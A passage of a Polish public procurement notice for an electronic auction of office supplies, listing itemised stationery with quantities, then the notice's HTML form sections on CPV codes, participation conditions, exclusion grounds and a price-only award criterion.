zabepieczającą przed zabrudzeniem, z wymienną poduszką, rozmiar łytki tekstowej 47-18 mm, wkładka tuszująca bez koloru.	40	szt.Automatyczna pieczątka posiadająca klapkę zabepieczającą przed zabrudzeniem, z wymienną poduszką,rozmiar łytki tekstowej 58-22 mm +/-1mm, wkładka tuszująca bez koloru.	40	szt.Pinezki kolorowe, posiadające trzpień wykonany ze stali nierdzewnej oraz kolorowe plastikowe główki, ilość w opakowaniu 50 szt.	15	op.Pinezki metalowe kolorowe, ilość w opakowaniu 50 szt., mix kolorów.	50	op.Pisak do tablic suchościeralnych okrągła końcówka, szybkoschnący, szerokośc linii pisania do 3 mm, skuwka w kolorze tuszu,kolor czarny.	70	szt.Pisak do tablic suchościeralnych okrągła końcówka, szybkoschnący, szerokośc linii pisania do 3 mm, skuwka w kolorze tuszu,kolor czerwony.	90	szt.Pisak do tablic suchościeralnych okrągła końcówka, szybkoschnący, szerokośc linii pisania do 3 mm, skuwka w kolorze tuszu,kolor niebieski.	80	szt.Pisak do tablic suchościeralnych okrągła końcówka, szybkoschnący, szerokośc linii pisania do 3 mm, skuwka w kolorze tuszu,kolor zielony.	60	szt.Plastelina sześciokolorowa, nie klejąca się do rąk oraz nadająca się do wielokrotnego użytku, nadająca się do odciskania wzorów i rozcierania palcami.	70	op.Podajnik biurkowy do taśmy klejącej 19mm, z obciążoną podstawą zapewniającą stabilność podczas użytkowania, posiadający podstawę antypoślizgową zapobiegającą przesuwaniu się jego po biurku, 100	szt.Pojemnik na czasopisma A4, szerokość grzbietu 75 mm, wykonany z tektury o grubości 2 mm +/- 0,1mm pokrytej folią, pojemność do 750 kartek o gramaturze do 80 gsm, składany, posiadający na grzbiecie miejsce opisowe, kolor. granatowy (ciemnoniebieski)	160	szt.Przekładki do segregatora alfabetyczne, format A4, ilość kart 20 +/-1 karta, przekładki pakowane z folię ochronną.	40	op.Przekładki plastikowe do segregatora A4, posiadające uniwersalną perforacje pozwalającą używanie przekładek w każdym segregatorze, karty numerowane 1-31.	15	op.Przybornik na biurko z metalej siateczki lakierowanej na czarno, posiadający trzy przegórki (jedna na artykuły piśmienne, druga na drobne akcesoria biurowe, trzecia na karteczki), wymiary przybornika nie mogą przekraczać 205x105x100 mm.	60	szt.Segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm, z grubego kartonu pokryty folią, z dwustronną etykietą, dolne krawędzie wzmiocnione niklowanymi okuciami, na grzbiecie wzmiocniony otwór na palec, kolor niebieski.	50	szt.Skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna żółty 150	szt.Skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna czerwona 100	szt.Skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna niebieska	150	szt.Skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna szara	100	szt.Skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna zielona	100	szt.Skorowidz 96 kartkowy A4 1/2, liniatura kratka, twarda oprawa.	70	szt.Skorowidz A5 96 kartkowy, liniatura kratka, twarda oprawa.	130	szt.Spinacz krzyżowy 40mm +/-1mm galwanizowany lub nikowany, w opakowaniu 50 szt.	90	op.Tablica korkowa w ramie aluminiowej, z zaokrąglonymi plastikowymi rogami, zestaw do montażu w komplecie, rozmiar 1200x900 mm, posiadająca możliwość zawieszenia jej w poziomie i w pionie.	40	szt.Tablica korkowa w ramie aluminiowej, z zaokrąglonymi plastikowymi rogami, zestaw do montażu w komplecie, rozmiar 600x900 mm, posiadająca możliwość zawieszenia jej w poziomie i w pionie.	40	szt.Tablica suchościeralna magnetyczna przeznaczona do pisania markerami suchościeralnymi oraz zawieszenia karteczek przy pomocy magnesów albo akcesoriów magnetycznych, rozmiar 150x120 cm, w zestawie półka na markery.	7	szt.Tablica planer magnetyczny miesięczny 90x120 cm w ramie aluminiowej w kolorze srebrnym, nazwy miesięcy w języku polskim.	15	szt.Tablica planer magnetyczny tygodniowy 60 x 90 cm w ramie aluminiowej w kolorze srebrnym, nazwy dni tygodnia w języku polskim.	15	szt.Taśma klejąca samoprzylepna, 19 mm x 33 m, matowa, w opakowaniu jednostkowym zabezpieczonym folią.	110	szt.Taśma dwustronna piankowa, szerokość 18mm, długość 3m, kolor biały	90	szt.Taśma klejąca, 19 mm x 33 m, przezroczysta, w opakowaniu jednostkowym zabezpieczonym folią	350	szt.Taśma klejąca, 24 mm x 20 m, przezroczysta (tolerancja +/- 1 m dla długości)	100	szt.Taśma klejąca pakowa, kolor - przezroczysta, rozmiar min. 48 mm x 50 y 120	szt.Taśma do naprawy papieru, transparentna, samoprzylepna, nie żółknąca z upływem czasu, wymiary 2 cm x 50 m.	70	szt.Teczka do podpisu A4/20 - na przedniej okładce otwierane okienko do opisu zawartości, posiadająca otwory do podglądu zawartości w przegródce, kolor teczki czarny	80	szt.Teczka do podpisu A4/20 - na przedniej okładce otwierane okienko do opisu zawartości, posiadająca otwory do podglądu zawartości w przegródce, kolor teczki czerwony	35	szt.Teczka do podpisu A4/20 - na przedniej okładce otwierane okienko do opisu zawartości, posiadająca otwory do podglądu zawartości w przegródce, kolor teczki granatowy.	100	szt.Teczka z gumką na dokumenty o formacie A4, wykonana z kartonu min. 390 g/m2, posiadająca trzy zakładki chroniące dokumenty przed wypadaniem. Kolor ciemno niebieski (granatowy).	380	szt.Teczka kartonowa posiadająca uchwyty umożliwiające jej zawieszenie, format A4. Kolor czerwony i zielony po równo każdego z kolorów.	220	szt.Teczka skrzydłowa z rzepem A4, wykonana z kartonu o grubości 2 mm +/-0,1 mm, pokryta folią PP, posiadająca min. 2 rzepy, kolor czarny.	190	szt.Teczka z rączką A4/40-50 mm na zamek kolor czarny i niebieski lub granatowy, w równych ilościach.	20	szt.Teczka z rączką A4/80-90 mm na zamek kolor czarny	15	szt.Dwuotworowa temperówka z pojemnikiem i pokrywą zabezpieczjącą, mocowane stalowe ostrza.	15	szt.Wizytownik obrotowy na min. 400 wizytówek, z przekładkami i możliwością łatwego wypięcia i wpięcia wizytówek, na metalowej podstawie.	60	szt.Wkład do długopisu typu Pentel BK77 czarny.	250	szt.Wkład do długopisu typu Pentel BK77 niebieski.	300	szt.Wkład do ciepnkopisu typu Pentel BL75, czarny, grubość linii pisania 0,25mm +/-0,01 mm.	100	szt.Wkład do ciepnkopisu typu Pentel BL75, niebieski, grubość linii pisania 0,25mm +/-0,01 mm.	250	szt.Wkład do długopisu typu ZENITH w obudowie metalowej niebieski.	400	szt.Wkład żelowy do długopisu typu PILOT G2 czerwony	200	szt.Wkład żelowy do długopisu typu PILOT G2 niebieski	250	szt.Zakładki indeksujące 12 x 43 mm (+/-2mm) , samoprzylepne, neonowe, z możliwością wielokrotnego odklejania i przyklejania, (op. 4x35 szt.), 4 kolorowe, każdy kolor w dyspenserku.	90	szt.Zakreślacz nadający się do wszystkich rodzajów papierów, różne kolory (kpl. 2 szt.)	15	kpl.Zakreślacz z fluorescencyjnym tuszem pigmentowym, płaski ze ściętą końcówką, szerokośc lini pisania 1-5 mm, nazwa producenta na obudowie (komplet 4 szt. w fabrycznym etui)	70	kpl.Zakreślacz w etui 8 szt., do wszystkich rodzajów papieru, tusz na bazie wody.	180	kpl.Klip archiwizacyjny z plastikową przekładką umożliwiającą segregację dokumentów, pasujące do segregatora zarówno kołowego jak i dźwigowego, różne kolory.	100	szt.Zaszyt w kratkę A4, 96 kartek, twarda oprawa, gramatura min. 80 g/m2.	260	szt.Zeszyt (brulion) w kratkę A4, 192 kartkowy, twarda okładka, gramanutra kartek min. 60 g/m2.	160	szt.Zeszyt (brulion) w kratkę A5, 160 kartkowy, twarda okładka, gramanutra kartek min. 60 g/m2.	100	szt.Zszywacz biurowy, zszywający do 30 kartek, zszywanie otwarte i zamknięte, na zszywki 24/6 i 26/6.	150	szt.Zeszyt (brulion) w kratkę A5, 32 kartkowy, miękka lakierowana okładka, gramanutra kartek min. 60 g/m2	250	szt.Zszywki 23/10, stalowe, galwanizowane (op. 1000 szt.)	100	szt.Zszywki 24/6, stalowe, galwanizowane (op. 1000 szt.)	400	op.Teczka konferencyjna na suwak posiadająca min. trzy kieszenie z których jedna z nich zapinana na suwak, przegródki na wizytówki, ring umożliwiający w pięcie dokumentów w koszulce A4, miejsce na notes w formacie A4, miejsce na długopis, kolor czarny.	20	szt.Podajnik do bloczków harmonijkowych 76x76mm, po wyciągnięciu jednej karteczki z podajnika kolejne wysuwają się automatycznie, 50	szt.Okładki do termobidownicy (standard), wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 1,5 mm (do 8 kartek), pakowane po 100 szt	1	op.Okładki do termobidownicy (standard), wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 3 mm (do 30 kartek),pakowane po 100 szt	1	op.Okładki do termobidownicy (standard), wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 4 mm (do 40 kartek), pakowane po 100 szt	1	op.Okładki do termobidownicy (standard) wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 6 mm (do 60 kartek), pakowane po 100 szt	1	op.Okładki do termobidownicy (standard) wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 8 mm (do 80 kartek), pakowane po 100 szt	1	op.Okładki do termobidownicy (standard) wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 10 mm (do 100 kartek), pakowane po 100 szt	1	op.Okładki do termobidownicy (standard) wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 12 mm (do 120 kartek), pakowane po 100 szt	1	op.Okładki do termobidownicy (standard) wierzchnia okładka przezroczysta, tylna okładka kartonowa; umożliwiająca oprawę dokumentów A4, okładka do termobindowania grubość 14-15 mm, 50	szt.Okładka do termobindownicy skóropodobna, wierzchnia okładka przezroczysta, tylna o fakturze skóropodobnej, grubość 1,5 mm (1-8 kartek), pakowane po 100 szt.	1	op.Okładka do termobindownicy skóropodobna, wierzchnia okładka przezroczysta, tylna o fakturze skóropodobnej, grubość 3 mm (9-30 kartek), pakowane po 100 szt.	1	op.Skorowidz, format A4 96-kartkowy, w twardej okładce, alfabetyczny register.	20	szt.Segregator A5 z mechanizmem dźwigowym, szer. grzbietu 75 cm, z tektury, okleina pokryta folią polipropylenową z połyskiem, wzmocniony otwór na palec,kolor czerwony.	30	szt.Segregator A5 z mechanizmem dźwigowym, szer. grzbietu 75cm, z tektury, okleina pokryta folią polipropylenową z połyskiem, wzmocniony otwór na palec,kolor niebieski.	30	szt.Segregator A5 z mechanizmem dźwigowym, szer. grzbietu 75 cm, z tektury, okleina pokryta folią polipropylenową z połyskiem, wzmocniony otwór na palec, kolor żółty.	30	szt.Stojak na wizytówki wykonany z przezroczystego polistyrenu dostosowany do standardowej wielkości karty wizytowej, wymiary nie większe niż 110x45x55 mm, kolor tansparentny.	20 szt.Wskaźnik laserowy z możliwością prowadzenia prezentacji (możliwość sterowania pokazem slajdów), odbiornik Plug&Play, obsługuje MS Word, Excel, PowerPoint, radiowa obsługa działająca na odległość min. 10 m., system operacyjny: rodzina Windows, zasięg wskaźnika do 200 m, zasilanie: bateria AAA 1.5 V.	25	szt.Atrament do pióra wiecznego 50 - 57 ml - kolor niebieski	20 szt.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30190000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199130-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199230-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22816300-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199410-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22815000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22816000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30193200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22851000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30197220-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192100-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192121-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192125-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192130-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30197320-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192131-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192160-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30197130-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199731-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44174000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192800-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>24910000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199410-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-10-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1)Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Przed podpisaniem umowy do każdego artykułu zawartego w umowie należy złożyć dokumenty potwierdzające spełnienia wymagań określonych w opisie przedmiotu zamówienia np. Karty produktu, opis przedmiotu itp.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) Wniosek o dopuszczenie do udziału w licytacji elektronicznej - załącznik nr 3 do Ogłoszenia 2) Oryginał lub kopię pełnomocnictwa dla osoby/osób podpisującej/ych wniosek o dopuszczenie do udziału w licytacji, gdy prawo do podpisania wniosku nie wynika z innych dokumentów</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) 